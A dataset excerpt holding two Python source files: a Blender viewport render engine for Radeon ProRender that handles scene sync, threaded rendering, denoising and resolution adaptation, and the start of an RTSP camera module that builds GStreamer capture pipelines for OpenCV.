source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
viewport_engine.py
|
#**********************************************************************
# Copyright 2020 Advanced Micro Devices, Inc
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#********************************************************************
import threading
import time
import math
from dataclasses import dataclass
import traceback
import textwrap
import bpy
import bgl
from gpu_extras.presets import draw_texture_2d
from bpy_extras import view3d_utils
import pyrpr
from .engine import Engine
from . import image_filter
from rprblender.export import camera, material, world, object, instance
from rprblender.export.mesh import assign_materials
from rprblender.utils import gl
from rprblender import utils
from rprblender.utils.user_settings import get_user_settings
from rprblender.utils import logging
log = logging.Log(tag='viewport_engine')
MIN_ADAPT_RATIO_DIFF = 0.2
MIN_ADAPT_RESOLUTION_RATIO_DIFF = 0.1
@dataclass(init=False, eq=True)
class ViewportSettings:
"""
Comparable dataclass which holds render settings for ViewportEngine:
- camera viewport settings
- render resolution
- screen resolution
- render border
"""
camera_data: camera.CameraData
screen_width: int
screen_height: int
border: tuple
def __init__(self, context: bpy.types.Context):
"""Initializes settings from Blender's context"""
self.camera_data = camera.CameraData.init_from_context(context)
self.screen_width, self.screen_height = context.region.width, context.region.height
scene = context.scene
# getting render border
x1, y1 = 0, 0
x2, y2 = self.screen_width, self.screen_height
if context.region_data.view_perspective == 'CAMERA':
if scene.render.use_border:
# getting border corners from camera view
# getting screen camera points
camera_obj = scene.camera
camera_points = camera_obj.data.view_frame(scene=scene)
screen_points = tuple(
view3d_utils.location_3d_to_region_2d(context.region,
context.space_data.region_3d,
camera_obj.matrix_world @ p)
for p in camera_points
)
# getting camera view region
x1 = min(p[0] for p in screen_points)
x2 = max(p[0] for p in screen_points)
y1 = min(p[1] for p in screen_points)
y2 = max(p[1] for p in screen_points)
# adjusting region to border
x, y = x1, y1
dx, dy = x2 - x1, y2 - y1
x1 = int(x + scene.render.border_min_x * dx)
x2 = int(x + scene.render.border_max_x * dx)
y1 = int(y + scene.render.border_min_y * dy)
y2 = int(y + scene.render.border_max_y * dy)
# adjusting to region screen resolution
x1 = max(min(x1, self.screen_width), 0)
x2 = max(min(x2, self.screen_width), 0)
y1 = max(min(y1, self.screen_height), 0)
y2 = max(min(y2, self.screen_height), 0)
else:
if context.space_data.use_render_border:
# getting border corners from viewport camera
x, y = x1, y1
dx, dy = x2 - x1, y2 - y1
x1 = int(x + context.space_data.render_border_min_x * dx)
x2 = int(x + context.space_data.render_border_max_x * dx)
y1 = int(y + context.space_data.render_border_min_y * dy)
y2 = int(y + context.space_data.render_border_max_y * dy)
# getting render resolution and render border
width, height = x2 - x1, y2 - y1
self.border = (x1, y1), (width, height)
def export_camera(self, rpr_camera):
"""Exports camera settings with render border"""
self.camera_data.export(rpr_camera,
((self.border[0][0] / self.screen_width, self.border[0][1] / self.screen_height),
(self.border[1][0] / self.screen_width, self.border[1][1] / self.screen_height)))
@property
def width(self):
return self.border[1][0]
@property
def height(self):
return self.border[1][1]
@dataclass(init=False, eq=True)
class ShadingData:
type: str
use_scene_lights: bool = True
use_scene_world: bool = True
studio_light: str = None
studio_light_rotate_z: float = 0.0
studio_light_background_alpha: float = 0.0
studio_light_intensity: float = 1.0
def __init__(self, context: bpy.types.Context):
shading = context.area.spaces.active.shading
self.type = shading.type
if self.type == 'RENDERED':
self.use_scene_lights = shading.use_scene_lights_render
self.use_scene_world = shading.use_scene_world_render
else:
self.use_scene_lights = shading.use_scene_lights
self.use_scene_world = shading.use_scene_world
if not self.use_scene_world:
self.studio_light = shading.selected_studio_light.path
if not self.studio_light:
self.studio_light = str(utils.blender_data_dir() /
"studiolights/world" / shading.studio_light)
self.studio_light_rotate_z = shading.studiolight_rotate_z
self.studio_light_background_alpha = shading.studiolight_background_alpha
if hasattr(shading, "studiolight_intensity"): # parameter added in Blender 2.81
self.studio_light_intensity = shading.studiolight_intensity
@dataclass(init=False, eq=True)
class ViewLayerSettings:
"""
Comparable dataclass which holds active view layer settings for ViewportEngine:
- override material
"""
material_override: bpy.types.Material = None
def __init__(self, view_layer: bpy.types.ViewLayer):
self.material_override = view_layer.material_override
class FinishRenderException(Exception):
pass
class ViewportEngine(Engine):
""" Viewport render engine """
TYPE = 'VIEWPORT'
def __init__(self, rpr_engine):
super().__init__(rpr_engine)
self.gl_texture = gl.GLTexture()
self.viewport_settings: ViewportSettings = None
self.world_settings: world.WorldData = None
self.shading_data: ShadingData = None
self.view_layer_data: ViewLayerSettings = None
self.sync_render_thread: threading.Thread = None
self.restart_render_event = threading.Event()
self.render_lock = threading.Lock()
self.is_finished = False
self.is_synced = False
self.is_rendered = False
self.is_resized = False
self.denoised_image = None
self.upscaled_image = None
self.requested_adapt_ratio = None
self.is_resolution_adapted = False
self.width = 1
self.height = 1
self.render_iterations = 0
self.render_time = 0
self.view_mode = None
self.use_contour = False
self.space_data = None
self.selected_objects = None
self.user_settings = get_user_settings()
def stop_render(self):
self.is_finished = True
self.restart_render_event.set()
self.sync_render_thread.join()
self.rpr_context = None
self.image_filter = None
def _resolve(self):
self.rpr_context.resolve()
def notify_status(self, info, status):
""" Display export progress status """
wrap_info = textwrap.fill(info, 120)
self.rpr_engine.update_stats(status, wrap_info)
log(status, wrap_info)
# requesting blender to call draw()
self.rpr_engine.tag_redraw()
def _do_sync(self, depsgraph):
# SYNCING OBJECTS AND INSTANCES
self.notify_status("Starting...", "Sync")
time_begin = time.perf_counter()
self.use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
# exporting objects
frame_current = depsgraph.scene.frame_current
material_override = depsgraph.view_layer.material_override
objects_len = len(depsgraph.objects)
for i, obj in enumerate(self.depsgraph_objects(depsgraph)):
if self.is_finished:
raise FinishRenderException
time_sync = time.perf_counter() - time_begin
self.notify_status(f"Time {time_sync:.1f} | Object ({i}/{objects_len}): {obj.name}",
"Sync")
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
object.sync(self.rpr_context, obj,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=self.use_contour)
# exporting instances
instances_len = len(depsgraph.object_instances)
last_instances_percent = 0
for i, inst in enumerate(self.depsgraph_instances(depsgraph)):
if self.is_finished:
raise FinishRenderException
instances_percent = (i * 100) // instances_len
if instances_percent > last_instances_percent:
time_sync = time.perf_counter() - time_begin
self.notify_status(f"Time {time_sync:.1f} | Instances {instances_percent}%", "Sync")
last_instances_percent = instances_percent
indirect_only = inst.parent.original.indirect_only_get(view_layer=depsgraph.view_layer)
instance.sync(self.rpr_context, inst,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=self.use_contour)
# shadow catcher
self.rpr_context.sync_catchers(depsgraph.scene.render.film_transparent)
self.is_synced = True
def _do_render(self):
# RENDERING
self.notify_status("Starting...", "Render")
is_adaptive = self.rpr_context.is_aov_enabled(pyrpr.AOV_VARIANCE)
MIN_DENOISE_ITERATION = 4
MAX_DENOISE_ITERATION_STEP = 32
# Infinite cycle, which starts when scene has to be re-rendered.
# It waits for restart_render_event be enabled.
# Exit from this cycle is implemented through raising FinishRender
# when self.is_finished be enabled from main thread.
while True:
self.restart_render_event.wait()
if self.is_finished:
raise FinishRenderException
# preparations to start rendering
iteration = 0
time_begin = 0.0
time_render = 0.0
if is_adaptive:
all_pixels = active_pixels = self.rpr_context.width * self.rpr_context.height
is_last_iteration = False
next_denoise_iteration = MIN_DENOISE_ITERATION
# this cycle renders each iteration
while True:
if self.is_finished:
raise FinishRenderException
is_adaptive_active = is_adaptive and iteration >= self.rpr_context.get_parameter(
pyrpr.CONTEXT_ADAPTIVE_SAMPLING_MIN_SPP)
if self.restart_render_event.is_set():
# clears restart_render_event, prepares to start rendering
self.restart_render_event.clear()
iteration = 0
if self.is_resized:
if not self.rpr_context.gl_interop:
# When gl_interop is not enabled, than resize is better to do in
# this thread. This is important for hybrid.
with self.render_lock:
self.rpr_context.resize(self.width, self.height)
self.is_resized = False
self.denoised_image = None
self.upscaled_image = None
self.rpr_context.sync_auto_adapt_subdivision()
self.rpr_context.sync_portal_lights()
time_begin = time.perf_counter()
log(f"Restart render [{self.width}, {self.height}]")
# rendering
with self.render_lock:
if self.restart_render_event.is_set():
break
self.rpr_context.set_parameter(pyrpr.CONTEXT_FRAMECOUNT, iteration)
self.rpr_context.render(restart=(iteration == 0))
iteration += 1
# denoising if needed
if self.image_filter and iteration == next_denoise_iteration:
self._resolve()
self.update_image_filter_inputs()
self.image_filter.run()
self.denoised_image = self.image_filter.get_data()
# increasing next_denoise_iteration by 2 times,
# but not more then MAX_DENOISE_ITERATION_STEP
next_denoise_iteration += min(next_denoise_iteration,
MAX_DENOISE_ITERATION_STEP)
if is_adaptive_active:
active_pixels = self.rpr_context.get_info(pyrpr.CONTEXT_ACTIVE_PIXEL_COUNT, int)
self.is_rendered = True
# checking for last iteration
# preparing information to show in viewport
time_render_prev = time_render
time_render = time.perf_counter() - time_begin
iteration_time = time_render - time_render_prev
if not self.is_resolution_adapted and iteration == 2:
target_time = 1.0 / self.user_settings.viewport_samples_per_sec
self.requested_adapt_ratio = target_time / iteration_time
if self.render_iterations > 0:
info_str = f"Time: {time_render:.1f} sec" \
f" | Iteration: {iteration}/{self.render_iterations}"
else:
info_str = f"Time: {time_render:.1f}/{self.render_time} sec" \
f" | Iteration: {iteration}"
if is_adaptive_active:
adaptive_progress = max((all_pixels - active_pixels) / all_pixels, 0.0)
info_str += f" | Adaptive Sampling: {math.floor(adaptive_progress * 100)}%"
if self.denoised_image is not None:
info_str += " | Denoised"
if self.render_iterations > 0:
if iteration >= self.render_iterations:
is_last_iteration = True
else:
if time_render >= self.render_time:
is_last_iteration = True
if is_adaptive and active_pixels == 0:
is_last_iteration = True
if is_last_iteration:
break
self.notify_status(info_str, "Render")
# notifying viewport that rendering is finished
if is_last_iteration:
with self.render_lock:
if self.image_filter:
# applying denoising
self._resolve()
self.update_image_filter_inputs()
self.image_filter.run()
self.denoised_image = self.image_filter.get_data()
if self.upscale_filter:
self.upscale_filter.update_input('color', self.denoised_image)
self.upscale_filter.run()
self.upscaled_image = self.upscale_filter.get_data()
elif self.upscale_filter:
self._resolve()
color = self.rpr_context.get_image()
self.upscale_filter.update_input('color', color)
self.upscale_filter.run()
self.upscaled_image = self.upscale_filter.get_data()
time_render = time.perf_counter() - time_begin
info_str = f"Time: {time_render:.1f} sec | Iteration: {iteration}"
if self.denoised_image is not None:
info_str += " | Denoised"
if self.upscaled_image is not None:
info_str += " | Upscaled"
self.notify_status(info_str, "Rendering Done")
def _do_sync_render(self, depsgraph):
"""
Thread function for self.sync_render_thread. It always run during viewport render.
If it doesn't render it waits for self.restart_render_event
"""
try:
self._do_sync(depsgraph)
self._do_render()
except FinishRenderException:
log("Finish by user")
except Exception as e:
log.error(e, 'EXCEPTION:', traceback.format_exc())
self.is_finished = True
# notifying viewport about error
self.notify_status(f"{e}.\nPlease see logs for more details.", "ERROR")
log("Finish _do_sync_render")
def sync(self, context, depsgraph):
log('Start sync')
scene = depsgraph.scene
viewport_limits = scene.rpr.viewport_limits
view_layer = depsgraph.view_layer
settings = get_user_settings()
use_gl_interop = settings.use_gl_interop and not scene.render.film_transparent
use_contour = scene.rpr.is_contour_used(is_final_engine=False)
scene.rpr.init_rpr_context(self.rpr_context, is_final_engine=False,
use_gl_interop=use_gl_interop,
use_contour_integrator=use_contour)
self.rpr_context.blender_data['depsgraph'] = depsgraph
self.shading_data = ShadingData(context)
self.view_layer_data = ViewLayerSettings(view_layer)
# setting initial render resolution as (1, 1) just for AOVs creation.
# It'll be resized to correct resolution in draw() function
self.rpr_context.resize(1, 1)
self.rpr_context.enable_aov(pyrpr.AOV_COLOR)
if viewport_limits.noise_threshold > 0.0:
# if adaptive is enable turn on aov and settings
self.rpr_context.enable_aov(pyrpr.AOV_VARIANCE)
viewport_limits.set_adaptive_params(self.rpr_context)
self.rpr_context.scene.set_name(scene.name)
self.world_settings = self._get_world_settings(depsgraph)
self.world_settings.export(self.rpr_context)
if scene.rpr.is_contour_used(is_final_engine=False):
scene.rpr.export_contour_mode(self.rpr_context)
rpr_camera = self.rpr_context.create_camera()
rpr_camera.set_name("Camera")
self.rpr_context.scene.set_camera(rpr_camera)
# image filter
self.setup_image_filter(self._get_image_filter_settings())
# upscale filter
self.setup_upscale_filter({
'enable': settings.viewport_denoiser_upscale,
'resolution': (self.width, self.height),
})
# other context settings
self.rpr_context.set_parameter(pyrpr.CONTEXT_PREVIEW, True)
self.rpr_context.set_parameter(pyrpr.CONTEXT_ITERATIONS, 1)
scene.rpr.export_render_mode(self.rpr_context)
scene.rpr.export_ray_depth(self.rpr_context)
scene.rpr.export_pixel_filter(self.rpr_context)
self.render_iterations, self.render_time = (viewport_limits.max_samples, 0)
self.is_finished = False
self.restart_render_event.clear()
self.view_mode = context.mode
self.use_contour = scene.rpr.is_contour_used(is_final_engine=False)
self.space_data = context.space_data
self.selected_objects = context.selected_objects
self.sync_render_thread = threading.Thread(target=self._do_sync_render, args=(depsgraph,))
self.sync_render_thread.start()
log('Finish sync')
def sync_update(self, context, depsgraph):
""" sync just the updated things """
if not self.is_synced:
return
if context.selected_objects != self.selected_objects:
# only a selection change
self.selected_objects = context.selected_objects
return
frame_current = depsgraph.scene.frame_current
# get supported updates and sort by priorities
updates = []
for obj_type in (bpy.types.Scene, bpy.types.World, bpy.types.Material, bpy.types.Object,
bpy.types.Collection, bpy.types.Light):
updates.extend(update for update in depsgraph.updates if isinstance(update.id, obj_type))
sync_collection = False
sync_world = False
is_updated = False
is_obj_updated = False
material_override = depsgraph.view_layer.material_override
shading_data = ShadingData(context)
if self.shading_data != shading_data:
sync_world = True
if self.shading_data.use_scene_lights != shading_data.use_scene_lights:
sync_collection = True
self.shading_data = shading_data
self.rpr_context.blender_data['depsgraph'] = depsgraph
# if view mode changed need to sync collections
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
mode_updated = False
if self.view_mode != context.mode or self.use_contour != use_contour:
self.view_mode = context.mode
self.use_contour = use_contour
mode_updated = True
if not updates and not sync_world and not sync_collection:
return
self._sync_update_before()
with self.render_lock:
for update in updates:
obj = update.id
log("sync_update", obj)
if isinstance(obj, bpy.types.Scene):
is_updated |= self.update_render(obj, depsgraph.view_layer)
# Outliner object visibility change will provide us only bpy.types.Scene update
# That's why we need to sync objects collection in the end
sync_collection = True
if is_updated:
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
continue
if isinstance(obj, bpy.types.Material):
is_updated |= self.update_material_on_scene_objects(obj, depsgraph)
continue
if isinstance(obj, bpy.types.Object):
if obj.type == 'CAMERA':
continue
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
active_and_mode_changed = mode_updated and context.active_object == obj.original
is_updated |= object.sync_update(self.rpr_context, obj,
update.is_updated_geometry or active_and_mode_changed,
update.is_updated_transform,
indirect_only=indirect_only,
material_override=material_override,
frame_current=frame_current,
use_contour=self.use_contour)
is_obj_updated |= is_updated
continue
if isinstance(obj, bpy.types.Light):
light = obj
for obj in self.depsgraph_objects(depsgraph):
if obj.data == light:
is_updated |= object.sync_update(self.rpr_context, obj, True, False)
if isinstance(obj, bpy.types.World):
sync_world = True
if isinstance(obj, bpy.types.Collection):
sync_collection = True
continue
if sync_world:
world_settings = self._get_world_settings(depsgraph)
if self.world_settings != world_settings:
self.world_settings = world_settings
self.world_settings.export(self.rpr_context)
is_updated = True
if sync_collection:
is_updated |= self.sync_objects_collection(depsgraph)
if is_obj_updated:
self.rpr_context.sync_catchers()
if is_updated:
self.restart_render_event.set()
self._sync_update_after()
def _sync_update_before(self):
pass
def _sync_update_after(self):
pass
@staticmethod
def _draw_texture(texture_id, x, y, width, height):
# INITIALIZATION
# Getting shader program
shader_program = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGetIntegerv(bgl.GL_CURRENT_PROGRAM, shader_program)
# Generate vertex array
vertex_array = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGenVertexArrays(1, vertex_array)
texturecoord_location = bgl.glGetAttribLocation(shader_program[0], "texCoord")
position_location = bgl.glGetAttribLocation(shader_program[0], "pos")
# Generate geometry buffers for drawing textured quad
position = [x, y, x + width, y, x + width, y + height, x, y + height]
position = bgl.Buffer(bgl.GL_FLOAT, len(position), position)
texcoord = [0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0]
texcoord = bgl.Buffer(bgl.GL_FLOAT, len(texcoord), texcoord)
vertex_buffer = bgl.Buffer(bgl.GL_INT, 2)
bgl.glGenBuffers(2, vertex_buffer)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[0])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, position, bgl.GL_STATIC_DRAW)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[1])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, texcoord, bgl.GL_STATIC_DRAW)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
# DRAWING
bgl.glActiveTexture(bgl.GL_TEXTURE0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, texture_id)
bgl.glBindVertexArray(vertex_array[0])
bgl.glEnableVertexAttribArray(texturecoord_location)
bgl.glEnableVertexAttribArray(position_location)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[0])
bgl.glVertexAttribPointer(position_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[1])
bgl.glVertexAttribPointer(texturecoord_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
bgl.glDrawArrays(bgl.GL_TRIANGLE_FAN, 0, 4)
bgl.glBindVertexArray(0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
# DELETING
bgl.glDeleteBuffers(2, vertex_buffer)
bgl.glDeleteVertexArrays(1, vertex_array)
def _get_render_image(self):
return self.rpr_context.get_image()
def draw_texture(self, texture_id, scene):
if scene.rpr.render_mode in ('WIREFRAME', 'MATERIAL_INDEX',
'POSITION', 'NORMAL', 'TEXCOORD'):
# Draw without color management
draw_texture_2d(texture_id, self.viewport_settings.border[0],
*self.viewport_settings.border[1])
else:
# Bind shader that converts from scene linear to display space,
bgl.glEnable(bgl.GL_BLEND)
bgl.glBlendFunc(bgl.GL_ONE, bgl.GL_ONE_MINUS_SRC_ALPHA)
self.rpr_engine.bind_display_space_shader(scene)
# note this has to draw to region size, not scaled down size
self._draw_texture(texture_id, *self.viewport_settings.border[0],
*self.viewport_settings.border[1])
self.rpr_engine.unbind_display_space_shader()
bgl.glDisable(bgl.GL_BLEND)
def _draw(self, scene):
im = self.upscaled_image
if im is not None:
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
return
im = self.denoised_image
if im is not None:
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
return
with self.render_lock:
self._resolve()
if self.rpr_context.gl_interop:
self.draw_texture(self.rpr_context.get_frame_buffer().texture_id, scene)
return
im = self._get_render_image()
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
def draw(self, context):
log("Draw")
if not self.is_synced or self.is_finished:
return
# initializing self.viewport_settings and requesting first self.restart_render_event
with self.render_lock:
if not self.viewport_settings:
self.viewport_settings = ViewportSettings(context)
self.viewport_settings.export_camera(self.rpr_context.scene.camera)
self._resize(*self._get_resolution())
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
self.restart_render_event.set()
if not self.is_rendered:
return
self._draw(context.scene)
# checking for viewport updates: setting camera position and resizing
with self.render_lock:
viewport_settings = ViewportSettings(context)
if viewport_settings.width * viewport_settings.height == 0:
return
if self.viewport_settings != viewport_settings:
self.viewport_settings = viewport_settings
self.viewport_settings.export_camera(self.rpr_context.scene.camera)
if self.user_settings.adapt_viewport_resolution:
self._adapt_resize(*self._get_resolution(),
self.user_settings.min_viewport_resolution_scale * 0.01)
else:
self._resize(*self._get_resolution())
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
self.restart_render_event.set()
else:
if self.requested_adapt_ratio is not None:
self._adapt_resize(*self._get_resolution(),
self.user_settings.min_viewport_resolution_scale * 0.01,
self.requested_adapt_ratio)
self.requested_adapt_ratio = None
self.is_resolution_adapted = True
elif not self.user_settings.adapt_viewport_resolution:
self._resize(*self._get_resolution())
if self.is_resized:
self.restart_render_event.set()
def _resize(self, width, height):
if self.width == width and self.height == height:
self.is_resized = False
return
self.width = width
self.height = height
if self.rpr_context.gl_interop:
# GL framebuffer ahs to be recreated in this thread,
# that's why we call resize here
self.rpr_context.resize(self.width, self.height)
if self.image_filter:
image_filter_settings = self.image_filter.settings.copy()
image_filter_settings['resolution'] = self.width, self.height
self.setup_image_filter(image_filter_settings)
if self.upscale_filter:
upscale_filter_settings = self.upscale_filter.settings.copy()
upscale_filter_settings['resolution'] = self.width, self.height
self.setup_upscale_filter(upscale_filter_settings)
if self.world_settings.backplate:
self.world_settings.backplate.export(self.rpr_context, (self.width, self.height))
self.is_resized = True
def _adapt_resize(self, max_w, max_h, min_scale, adapt_ratio=None):
# trying to use previous resolution or almost same pixels number
min_w = max(int(max_w * min_scale), 1)
min_h = max(int(max_h * min_scale), 1)
w, h = self.rpr_context.width, self.rpr_context.height
if adapt_ratio is None:
if abs(w / h - max_w / max_h) > MIN_ADAPT_RESOLUTION_RATIO_DIFF:
scale = math.sqrt(w * h / (max_w * max_h))
w, h = int(max_w * scale), int(max_h * scale)
else:
if abs(1.0 - adapt_ratio) > MIN_ADAPT_RATIO_DIFF:
scale = math.sqrt(adapt_ratio)
w, h = int(self.rpr_context.width * scale), \
int(self.rpr_context.height * scale)
else:
w, h = self.rpr_context.width, self.rpr_context.height
self._resize(min(max(w, min_w), max_w),
min(max(h, min_h), max_h))
def _get_resolution(self, vs=None):
if not vs:
vs = self.viewport_settings
if self.upscale_filter:
return vs.width // 2, vs.height // 2
return vs.width, vs.height
def sync_objects_collection(self, depsgraph):
"""
Removes objects which are not present in depsgraph anymore.
Adds objects which are not present in rpr_context but existed in depsgraph
"""
res = False
view_layer_data = ViewLayerSettings(depsgraph.view_layer)
material_override = view_layer_data.material_override
# set of depsgraph object keys
depsgraph_keys = set.union(
set(object.key(obj) for obj in self.depsgraph_objects(depsgraph)),
set(instance.key(obj) for obj in self.depsgraph_instances(depsgraph))
)
# set of visible rpr object keys
rpr_object_keys = set(key for key, obj in self.rpr_context.objects.items()
if not isinstance(obj, pyrpr.Shape) or obj.is_visible)
# sets of objects keys to remove from rpr
object_keys_to_remove = rpr_object_keys - depsgraph_keys
# sets of objects keys to export into rpr
object_keys_to_export = depsgraph_keys - rpr_object_keys
if object_keys_to_remove:
log("Object keys to remove", object_keys_to_remove)
for obj_key in object_keys_to_remove:
if obj_key in self.rpr_context.objects:
self.rpr_context.remove_object(obj_key)
res = True
if object_keys_to_export:
log("Object keys to add", object_keys_to_export)
res |= self.sync_collection_objects(depsgraph, object_keys_to_export,
material_override)
res |= self.sync_collection_instances(depsgraph, object_keys_to_export,
material_override)
# update/remove material override on rest of scene object
if view_layer_data != self.view_layer_data:
# update/remove material override on all other objects
self.view_layer_data = view_layer_data
res = True
rpr_mesh_keys = set(key for key, obj in self.rpr_context.objects.items()
if isinstance(obj, pyrpr.Mesh) and obj.is_visible)
unchanged_meshes_keys = tuple(e for e in depsgraph_keys if e in rpr_mesh_keys)
log("Object keys to update material override", unchanged_meshes_keys)
self.sync_collection_objects(depsgraph, unchanged_meshes_keys,
material_override)
rpr_instance_keys = set(key for key, obj in self.rpr_context.objects.items()
if isinstance(obj, pyrpr.Instance) and obj.is_visible)
unchanged_instances_keys = tuple(e for e in depsgraph_keys if e in rpr_instance_keys)
log("Instance keys to update material override", unchanged_instances_keys)
self.sync_collection_instances(depsgraph, unchanged_instances_keys,
material_override)
return res
def sync_collection_objects(self, depsgraph, object_keys_to_export, material_override):
""" Export collections objects """
res = False
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
for obj in self.depsgraph_objects(depsgraph):
obj_key = object.key(obj)
if obj_key not in object_keys_to_export:
continue
rpr_obj = self.rpr_context.objects.get(obj_key, None)
if not rpr_obj:
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
object.sync(self.rpr_context, obj,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=use_contour)
else:
assign_materials(self.rpr_context, rpr_obj, obj, material_override)
res = True
return res
def sync_collection_instances(self, depsgraph, object_keys_to_export, material_override):
""" Export collections instances """
res = False
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
for inst in self.depsgraph_instances(depsgraph):
instance_key = instance.key(inst)
if instance_key not in object_keys_to_export:
continue
inst_obj = self.rpr_context.objects.get(instance_key, None)
if not inst_obj:
indirect_only = inst.parent.original.indirect_only_get(view_layer=depsgraph.view_layer)
instance.sync(self.rpr_context, inst,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=use_contour)
else:
assign_materials(self.rpr_context, inst_obj, inst.object, material_override=material_override)
res = True
return res
def update_material_on_scene_objects(self, mat, depsgraph):
""" Find all mesh material users and reapply material """
material_override = depsgraph.view_layer.material_override
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
if material_override and material_override.name == mat.name:
objects = self.depsgraph_objects(depsgraph)
active_mat = material_override
else:
objects = tuple(obj for obj in self.depsgraph_objects(depsgraph)
if mat.name in obj.material_slots.keys())
active_mat = mat
updated = False
for obj in objects:
rpr_material = material.sync_update(self.rpr_context, active_mat, obj=obj)
rpr_volume = material.sync_update(self.rpr_context, active_mat, 'Volume', obj=obj)
rpr_displacement = material.sync_update(self.rpr_context, active_mat, 'Displacement', obj=obj)
if not rpr_material and not rpr_volume and not rpr_displacement:
continue
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
if object.key(obj) not in self.rpr_context.objects:
object.sync(self.rpr_context, obj, indirect_only=indirect_only,
frame_current=frame_current, use_contour=use_contour)
updated = True
continue
updated |= object.sync_update(self.rpr_context, obj, False, False,
indirect_only=indirect_only,
material_override=material_override,
frame_current=frame_current,
use_contour=use_contour)
return updated
def update_render(self, scene: bpy.types.Scene, view_layer: bpy.types.ViewLayer):
''' update settings if changed while live returns True if restart needed '''
restart = scene.rpr.export_render_mode(self.rpr_context)
restart |= scene.rpr.export_ray_depth(self.rpr_context)
restart |= scene.rpr.export_pixel_filter(self.rpr_context)
render_iterations, render_time = (scene.rpr.viewport_limits.max_samples, 0)
if self.render_iterations != render_iterations or self.render_time != render_time:
self.render_iterations = render_iterations
self.render_time = render_time
restart = True
restart |= scene.rpr.viewport_limits.set_adaptive_params(self.rpr_context)
# image filter
if self.setup_image_filter(self._get_image_filter_settings()):
self.denoised_image = None
restart = True
restart |= self.setup_upscale_filter({
'enable': get_user_settings().viewport_denoiser_upscale,
'resolution': (self.width, self.height),
})
return restart
def _get_world_settings(self, depsgraph):
if self.shading_data.use_scene_world:
return world.WorldData.init_from_world(depsgraph.scene.world)
return world.WorldData.init_from_shading_data(self.shading_data)
def _get_image_filter_settings(self):
return {
'enable': get_user_settings().viewport_denoiser_upscale,
'resolution': (self.width, self.height),
'filter_type': 'ML',
'ml_color_only': False,
'ml_use_fp16_compute_type': True,
}
def depsgraph_objects(self, depsgraph, with_camera=False):
for obj in super().depsgraph_objects(depsgraph, with_camera):
if obj.type == 'LIGHT' and not self.shading_data.use_scene_lights:
continue
# check for local view visability
if not obj.visible_in_viewport_get(self.space_data):
continue
yield obj
def depsgraph_instances(self, depsgraph):
for instance in super().depsgraph_instances(depsgraph):
# check for local view visability
if not instance.parent.visible_in_viewport_get(self.space_data):
continue
yield instance
|
camera.py
|
from mini_vstreamer.api.defaults import system
from mini_vstreamer.core.config import Configurable
from mini_vstreamer.core.thread import Runnable
from threading import Thread
from time import time, sleep
import cv2
import logging
import subprocess
def open_gst_rtsp(uri, width=None, height=None, latency=2000):
"""Open an RTSP URI (IP CAM)."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'omxh264dec' in gst_elements:
if width is not None and height is not None:
xraw = 'video/x-raw, width=(int){}, height=(int){}, '.format(width, height)
elif width is not None and height is None:
xraw = 'video/x-raw, width=(int){}, '.format(width)
elif width is None and height is not None:
xraw = 'video/x-raw, height=(int){}, '.format(height)
else:
xraw = 'video/x-raw, '
# Uses NVDEC H.264 decoder on Jetson
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
+ xraw +
'format=(string)BGRx ! videoconvert ! '
'appsink').format(uri, latency, width, height)
elif 'avdec_h264' in gst_elements:
# Software decoder avdec_h264
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! avdec_h264 ! '
'videoconvert ! appsink').format(uri, latency)
else:
raise RuntimeError('H.264 decoder not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
class Camera(Configurable, Runnable):
"""
Camera Object
"""
def __init__(self, index, configio, system):
Configurable.__init__(self, index, configio, system, 'cameras')
Runnable.__init__(self, self.get('name'))
self.__ommitCheckQIn__ = True
self.__outQ__ = None
